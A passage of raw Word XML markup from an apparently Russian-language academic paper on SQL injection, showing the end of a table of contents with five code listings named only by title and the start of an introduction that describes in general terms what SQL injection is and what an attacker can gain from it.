              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009332E1" w:rsidRDefault="00277DCB">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420854444" w:history="1">
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Листинг 1</w:t>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420854444 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009332E1" w:rsidRDefault="00277DCB">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420854445" w:history="1">
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Листинг 2</w:t>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420854445 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009332E1" w:rsidRDefault="00277DCB">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420854446" w:history="1">
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Листинг</w:t>
            </w:r>
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420854446 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009332E1" w:rsidRDefault="00277DCB">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420854447" w:history="1">
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Листинг</w:t>
            </w:r>
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420854447 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009332E1" w:rsidRDefault="00277DCB">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420854448" w:history="1">
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Листинг 5</w:t>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420854448 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00EB5DBA" w:rsidRDefault="00277DCB">
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>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423C8F" w:rsidRDefault="00423C8F" w:rsidP="00D21A0A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc420429529"/>
    </w:p>
    <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F" w:rsidP="00423C8F"/>
    <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F" w:rsidP="00423C8F"/>
    <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F" w:rsidP="00423C8F">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc420854432"/>
      <w:r w:rsidRPr="00D21A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Введение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00423C8F" w:rsidRPr="00423C8F" w:rsidRDefault="00423C8F" w:rsidP="00423C8F"/>
    <w:bookmarkEnd w:id="0"/>
    <w:p w:rsidR="008E55BC" w:rsidRPr="003B32C2" w:rsidRDefault="00F84B90"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Внедрение SQL-кода (sql-инъекция) - это один из распространённых способов взлома сайтов и приложений, которые работают с базами данных. </w:t>
      </w:r>
      <w:r w:rsidR="008A531B" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Атака производится</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> злоумышленником </w:t>
      </w:r>
      <w:r w:rsidR="008A531B" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>посредством</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> вставк</w:t>
      </w:r>
      <w:r w:rsidR="008A531B" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> вредонос</w:t>
      </w:r>
      <w:r w:rsidR="008A531B" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ного кода в строки, передаваемые</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> на сервер</w:t>
      </w:r>
      <w:r w:rsidR="008A531B" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> системы управления</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базами данных</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> для синтаксического анализа и </w:t>
      </w:r>
      <w:r w:rsidR="008A531B" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">последующего </w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">выполнения. </w:t>
      </w:r>
      <w:r w:rsidR="008A531B" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При успешном</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выполнении</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> данной атаки </w:t>
      </w:r>
      <w:r w:rsidR="008A531B" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>можно</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> обойти систему безопасности приложения</w:t>
      </w:r>
      <w:r w:rsidR="008A531B" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или сайта. </w:t>
      </w:r>
      <w:r w:rsidR="009B74C2" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Атака внедрением SQL-кода, в зависимости от того, какая </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tooltip="Реляционная СУБД" w:history="1">
        <w:r w:rsidR="009B74C2" w:rsidRPr="003B32C2">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>СУБД</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009B74C2" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> используется и доступных способов внедрения, может дать атакующему возможность выполнить практически любой произвольный запрос к базе данных. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A515D" w:rsidRPr="003B32C2" w:rsidRDefault="009B74C2"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Для примера можно прочитать содержимое любых таблиц, удалить, изменить или добавить данные, получить возможность чтения и/или записи локальных файлов. В некоторых случаях</w:t>
      </w:r>
      <w:r w:rsidR="008A531B" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> злоумышленник может получить доступ к </w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">внутренней корпоративной сети организации и считать </w:t>
      </w:r>
      <w:r w:rsidR="008A531B" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>конфиденциальны</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е данные</w:t>
      </w:r>
      <w:r w:rsidR="006D3DB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> из </w:t>
      </w:r>
      <w:r w:rsidR="008A531B" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> баз</w:t>
      </w:r>
      <w:r w:rsidR="006D3DB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidR="008A531B" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> данных и </w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>выполнить</w:t>
      </w:r>
      <w:r w:rsidR="008A531B"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некоторые критические </w:t>
      </w:r>
      <w:r w:rsidR="008A531B" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>команд</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidR="008A531B" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> операционной системы сервера СУБД. </w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Он даже может </w:t>
      </w:r>
      <w:r w:rsidR="008A531B" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>провести атаку на друг</w:t>
      </w:r>
      <w:r w:rsidR="006D3DB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ие сервера, расположенные в той же сети</w:t>
      </w:r>
      <w:r w:rsidR="008A531B" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006D3DB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ошибочно было бы полагать, что</w:t>
      </w:r>
      <w:r w:rsidR="008A531B" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B53B61" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">внедрение </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B53B61" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B53B61" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> кода возможно только в </w:t>
      </w:r>
      <w:r w:rsidR="00F84B90" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>web-приложени</w:t>
      </w:r>
      <w:r w:rsidR="006D3DB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ях;</w:t>
      </w:r>
      <w:r w:rsidR="00F84B90" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> на самом деле</w:t>
      </w:r>
      <w:r w:rsidR="006D3DB3" w:rsidRPr="006D3DB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F84B90" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> данн</w:t>
      </w:r>
      <w:r w:rsidR="00B53B61" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ой</w:t>
      </w:r>
      <w:r w:rsidR="00F84B90" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> уязвимост</w:t>
      </w:r>
      <w:r w:rsidR="00B53B61" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00F84B90" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> подвержены любые клиент-серверные и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F84B90" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>сервис-ориентированные</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F84B90" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> приложения, работающие с </w:t>
      </w:r>
      <w:r w:rsidR="00B53B61" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>системой управления базами данных</w:t>
      </w:r>
      <w:r w:rsidR="00F84B90" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C385A" w:rsidRPr="00673E72" w:rsidRDefault="002C385A" w:rsidP="009A31ED">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="351" w:lineRule="atLeast"/>
        <w:ind w:firstLine="706"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00673E72">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
